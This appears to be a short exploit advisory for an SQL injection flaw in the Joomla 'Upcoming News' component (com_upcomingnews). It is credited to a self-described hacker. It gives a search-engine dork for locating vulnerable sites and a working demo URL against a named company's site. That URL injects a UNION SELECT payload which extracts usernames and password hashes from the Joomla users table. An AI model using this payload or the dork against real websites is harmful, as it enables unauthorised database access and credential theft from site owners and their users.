The Joomla Upcoming News component suffers from a remote SQL injection vulnerability.
57cb48d7ac1bd4e9145e585a02280ab5947ef0bdb9181ed224af8cf00e24b7ed
#--------------------------------------------------------
#Joomla (com_upcomingnews) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc ALGERIAN HaCkEr
#Mail: snakespc@gmail.com
#site:anti-sec.info/vb/index.php
#-------------------------------------------------------
#Dork:inurl"com_upcomingnews"
#Exploit:
#--------
#Demo:
#https://www.zilog.com//index.php?option=com_upcomingnews&Itemid=147&headno=-37+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8+from+romweb.jos_users--
----------------------------------------------------------